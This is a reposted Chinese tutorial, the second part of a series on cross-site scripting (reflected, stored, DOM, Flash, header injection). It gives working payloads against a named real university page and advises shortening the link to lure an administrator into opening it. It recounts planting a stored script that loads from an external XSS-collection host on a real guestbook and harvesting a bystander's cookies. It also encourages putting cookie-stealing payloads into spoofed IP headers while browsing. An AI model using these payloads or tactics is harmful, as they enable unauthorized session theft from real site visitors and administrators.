安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > XSS的原理分析与解剖(第二篇)

XSS的原理分析与解剖(第二篇)

时间:2014-09-22来源: 作者:Black-Hole点击:
001前言:上节(http://www.freebuf.com/articles/web/40520.html)已经说明了xss的原理及不同环境的构造方法。本期来说说XSS的分类及挖掘方法。当第一期出来的时候,反馈很好,但还是有很多…

XSS的原理分析与解剖(第二篇)

//内容来自安云网

0×01 前言:  //本文来自安云网

上节(http://www.freebuf.com/articles/web/40520.html)已经说明了xss的原理及不同环境的构造方法。本期来说说XSS的分类及挖掘方法。

//内容来自安云网

当第一期出来的时候,反馈很好,但还是有很多人提出疑问,我这里就解答下。 //本文来自安云网

问1:如果我输入PHP语句会不会执行。 //本文来自安云网

答1:不会,因为XSS是面对前台的(用户可见部分),而PHP则是后台处理(用户不可见部分),如果可以执行PHP语句的话,那不叫XSS,叫"任意代码执行"。 //本文来自安云网

问2:XSS和CSRF有什么区别么? //内容来自AnYun.ORG

答2:有的,XSS是获取信息,不需要提前知道其他用户页面的代码和数据包。CSRF是代替用户完成指定的动作,需要知道其他用户页面的代码和数据包。

//内容来自安云网

问3:为什么我在chrome浏览器下测试<script>alert("xss")</script>并没有成功。

//本文来自安云网

答3:chrome内核与ie内核不一样,chrome的过滤机制比ie强。现在测试xss一般都拿能过chrome的为主,所以当你输入xss的时候,可能被chrome的过滤机制给过滤了。

//内容来自安云网

 

//本文来自安云网

想了解反射XSS、储蓄XSS、DOM XSS,要先了解GET/POST的处理方式,不懂的话,请查考传送门

//本文来自安云网

0×02 反射型XSS: //本文来自安云网

反射XSS是XSS分类中最多的,他们原理是下面这样:

//内容来自安云网

Hacker——发现存在反射XSS的URL——根据输出点的环境构造XSS代码——进行编码、缩短(可有可无,是为了增加迷惑性)——发送给受害人——受害打开后,执行XSS代码——完成hacker想要的功能(获取cookies、url、浏览器信息、IP等等) //本文来自安云网

原理搞清楚,那就说说怎么挖掘吧, //内容来自安云网

现在市面上的软件(JSky、Safe3WVS、Netsparker等)都可以挖掘出反射XSS,但是想要那些更隐蔽的XSS还是需要手工的,我先使用软件挖掘一些反射XSS,然后介绍手工挖掘。 //本文来自安云网

XSS的原理分析与解剖(第二篇)

//内容来自安云网

找到后,我们来打开 //内容来自AnYun.ORG

http://gdjy.hfut.edu.cn/viewcomp.jsp?id=hzgz123 
//内容来自AnYun.ORG

打开后,我们试着在参数也就是id=hzgz123后面加上woaini(或则其他字符,这串字符必须保持唯一性,也就是说在整个网站里,他必须唯一一个不和其他字符相同的字符串)输入woaini后,打开,查看源代码(ctrl+u),按下ctrl+f来搜索woaini字符串,看出现在哪个位置。

//本文来自安云网

XSS的原理分析与解剖(第二篇) //本文来自安云网

我们发现woaini字符在a标签的href属性里,那我们就可以根据这个环境来构造了,我们可以用"></a><script>alert("xss")</script>来先闭合掉a标签。然后再用script来运行js代码。也可以这样onclick="alert(1)";>123</a>//点击123触发onclick来运行js,然后把后面的内容来注释掉。构造好代码后,把url变成短连接,发送给管理员,诱惑管理员打开,就可以获取管理员的cookies了。

//内容来自AnYun.ORG

OK,软件挖XSS大致就这些,手工其实和这差不多,手工的话,记住一句话“见框就插、改数据包不可见部分、改URL参数、js分析”就可以了。改数据包、js分析比较深,现在我就不再阐述了,见框就插,大家应该都明白,找到一个input输入框,先输入唯一字符串,然后看源代码里有没有出现,再输入<>""/&()来看看过滤了哪些字符,根据过滤的字符,来构造xss。

//内容来自安云网

下图是QQ空间一处反射XSS,因为是朋友给的,我也不清楚是否被提交,所以我就不放出了。

//本文来自安云网

XSS的原理分析与解剖(第二篇)

//内容来自安云网

0×03 储蓄型XSS:

//本文来自安云网

PS:有的人叫持久型,各有各的叫法,所以不用太介意。 //内容来自AnYun.ORG

储蓄型XSS其实和反射型XSS差不多,只是储蓄型把数据保存到服务端,而反射型只是让XSS游走在客户端上。下面是我在某处网站上检测到的储蓄XSS,大家知道原理就OK。

//本文来自安云网

(因为,这个网站本人想提交,所以URL打码处理,见谅)

//内容来自安云网

目标站点:http://www.*******.com/

//内容来自安云网

习惯性的打开留言处(book.asp),点击留言(这里最好不要使用<script>alert("xss")</script>来测试是否存在XSS漏洞,容易被管理员发现,所以你可以使用<a></a>来测试,如果成功了,不会被管理员发现)OK,我先在留言里出输入<a>s</a>提交留言,F12打开审查元素,来看我们输入的标签是否被过滤了, //内容来自AnYun.ORG

XSS的原理分析与解剖(第二篇)

//内容来自安云网

OK,发现没有过滤(如果<a>s</a>是彩色的说明没有过滤,如果是灰色就说明过滤了)

//内容来自AnYun.ORG

那我就在xss平台里创建一个项目,然后再次留言,里面写上,“<script src="http://xss8.pw/EFe2Ga?1409273226"></script>请问怎么报名啊” //本文来自安云网

XSS的原理分析与解剖(第二篇) //内容来自安云网

名字是我乱起的,这样一来,只要你访问

//本文来自安云网

http://www.******.com/book.asp

//本文来自安云网

就可以获取你的cookies,以及后台地址(因为留言板一般都在后台做审核)。但是,管理员好像死了,已经6天了,还没看。今天上xss平台一看有个cookies,看了下,是路人的,并不是管理员的。 //内容来自AnYun.ORG

XSS的原理分析与解剖(第二篇)

//本文来自安云网

但是使用方法大家也应该懂了。只要你打开http://www.******.com/book.asp 我就会在第一时间获取你的cookies。 //本文来自安云网

0×04 DOM XSS:

//内容来自安云网

DOM XSS是基于在js上的。而且他不需要与服务端进行交互,像反射、储蓄都需要服务端的反馈来构造xss,因为服务端对我们是不可见的(不是太清楚的,可以看看(http://www.freebuf.com/articles/neopoints/41168.html一文) //本文来自安云网

挖掘DOM XSS比较麻烦,因为有时你需要追源,对方可能会自定义函数,所以你需要一步一步来把对方自定义的函数来搞清楚。下面我举个最简单的例子:

//内容来自AnYun.ORG

在1.html里输入 //内容来自AnYun.ORG

<script>
document.write(document.URL.substring(document.URL.indexOf("a=")+2,document.URL.length));
</script> 

//内容来自AnYun.ORG


//本文来自安云网

在这里我先解释下上面的意思

//本文来自安云网

Document.write是把里面的内容写到页面里。 //内容来自AnYun.ORG

document.URL是获取URL地址。 //内容来自AnYun.ORG

Substring 从某处到某处,把之间的内容获取。 //内容来自AnYun.ORG

document.URL.indexOf("a=")+2是在当前URL里从开头检索a=字符,然后加2(因为a=是两个字符,我们需要把他略去),同时他也是substring的开始值 //本文来自安云网

document.URL.length是获取当前URL的长度,同时也是substring的结束值。 //本文来自安云网

合起来的意思就是:在URL获取a=后面的值,然后把a=后面的值给显示出来。

//内容来自AnYun.ORG

我们打开,看看

//内容来自安云网

XSS的原理分析与解剖(第二篇) //内容来自安云网

怎么会出现这个问题呢? //本文来自安云网

因为当前url并没有a=的字符,而indexOf的特性是,当获取的值里,如果没有找到自己要检索的值的话,返回-1。找到了则返回0。那么document.URL.indexOf("a=")则为-1,再加上2,得1。然后一直到URL最后。这样一来,就把file的f字符给略去了,所以才会出现ile:///C:/Users/Administrator/Desktop/1.html //本文来自安云网

大致的原理都会了,我们继续。 //内容来自AnYun.ORG

我们可以在1.html后输入?a=123或则#a=123,只要不影响前面的路径,而且保证a=出现在URL就可以了。 //内容来自安云网

XSS的原理分析与解剖(第二篇)

//内容来自安云网

XSS的原理分析与解剖(第二篇)

//内容来自AnYun.ORG

我们清楚的看到我们输入的字符被显示出来了。 //内容来自安云网

那我们输入<script>alert("xss")</script>会怎么样呢?

//内容来自安云网

答案肯定是弹窗。

//内容来自安云网

XSS的原理分析与解剖(第二篇) //内容来自安云网

但是,这里肯定有人无法弹窗,像下面这样。 //内容来自AnYun.ORG

XSS的原理分析与解剖(第二篇) //内容来自AnYun.ORG

这是因为浏览器不同,maxthon、firfox、chrome则不行,他们会在你提交数据之前,对url进行编码。这不是说DOM XSS不行了,这只是个很简单的例子,所以不用在意。

//内容来自安云网

我在说下,DOM XSS 是基于javascript基础上,而且不与服务端进行交互,他的code对你是可见的,而基于服务端的反射、储蓄则是不可见的。

//内容来自安云网

0×05 XSF(Flash XSS): //内容来自安云网

XSF其实不算XSS的分类中,应该算作XSS的分支,因为在XSS使用到的技巧,在XSF只有一部分可以使用,因为XSF是基于ActionScript2/3.0语言的基础上。

//内容来自安云网

我写XSS系列是为了让大多数对XSS不熟悉的人知晓如何运用这门攻击手法,所以,在此我不打算深入介绍XSF,如果有机会,你们将会在后期的系列里看到关于XSF技术的。 //本文来自安云网

我先简要的说明下,在ActionScript2/3.0里以下几个函数需要重点关注下:

//本文来自安云网

getURL  navigateToURL  ExternalInterface.call  ExternalInterface.call  htmlText  addcallback等。有兴趣的朋友可以先自行研究下。 //本文来自安云网

0×06 挖掘XSS: //本文来自安云网

挖掘XSS的技巧很多,各式各样,我这里就简要说明下容易出现XSS的地方。

//内容来自安云网

之前说过了修改输入框和URL参数来实现XSS。我在这里深入一点说明下。 //本文来自安云网

修改URL参数的时候,你看到的只是用GET来传输数据的,还有隐形的数据,他们是用POST来传输数据,只有在数据包里才可以看到。这里不就阐述了,不懂的可以参考之前我写的利用方法,GET和POST利用方法几乎一样。不清楚POST和GET的可以在0×01 前言里查看下我给出的链接。

//内容来自安云网

废话也不说了,下面进入正题。

//本文来自安云网

一:我们都知道当你浏览网站的时候,对方的服务器会记录下你的IP地址。如果我们伪造IP为XSS代码呢?这里说的修改IP为XSS不是说修改PC端的,而是在浏览器也就是网页上的客户端进行修改。

//内容来自安云网

这里需要使用firefox浏览器和两个附件 //内容来自安云网

附件一:X-Forwarded-For Header //内容来自安云网

因为PHP获取IP有3个函数。而X-Forwarded-For Header就是对其中一个函数X_FORWARDED_FOR起作用,X_FORWARDED_FOR有个缺陷可以使客户端伪造任意IP,当然包括字符串,但是对其他两个函数就不行了。 //本文来自安云网

附件二:Modify Headers

//本文来自安云网

Modify Headers可以伪造数据包内容,当然也可以伪造HTTP_CLIENT_IP来更改IP。

//内容来自安云网

  //本文来自安云网

那还有一个REMOTE_ADDR获取IP函数,这个怎么修改呢?答案是无法修改。

//内容来自安云网

REMOTE_ADDR是由 nginx 传递给 php 的参数,所以就是当前 nginx 直接通信的客户端的 IP ,而我们无法插手。所以一旦对方使用了REMOTE_ADDR函数来获取IP,那就没办法了。不过不要紧,一共3个函数,2个函数可以伪造,我们还是有很大的成功率的。好了,开始伪造。

//内容来自安云网

XSS的原理分析与解剖(第二篇)

//内容来自安云网

XSS的原理分析与解剖(第二篇) //内容来自安云网

伪造好后,我们打开www.ip138.com看看,

//内容来自AnYun.ORG

XSS的原理分析与解剖(第二篇)

//本文来自安云网

成功弹窗了。因为我在X-Forwarded-For Header里配置的是<script>alert("xss")</script>。而在Modify Headers配置的是<script>alert("xss2")</script>。也就是说ip138.com使用的是X_FORWARDED_FOR函数来获取IP的。但是DZ等著名CMS不存在,他们都过滤了。 //本文来自安云网

就像漏洞盒子一样(https://www.vulbox.com), //本文来自安云网

XSS的原理分析与解剖(第二篇)

//本文来自安云网

使用的是HTTP_CLIENT_IP函数来获取IP的,但是过滤了。你们可以先把配置写好,构造成一个获取cookies的。以后就随便的浏览网站,说不定某天就可以钓上一个呢。

//内容来自AnYun.ORG

本方法是Misty去年告知。 //内容来自AnYun.ORG

0×07 结束:

//内容来自安云网

由本章可以知晓XSS不一定是在input输入框和GET/POST参数修改,才可以插入XSS。还有JavaScript、ActionScript2/3.0、数据包参数。玩XSS的时候,思想不能固定,要灵活多变。 //内容来自AnYun.ORG

本章也就结束了,下节如果不出什么意外的话是讲XSS技巧,敬请期待。

//本文来自安云网

//内容来自AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容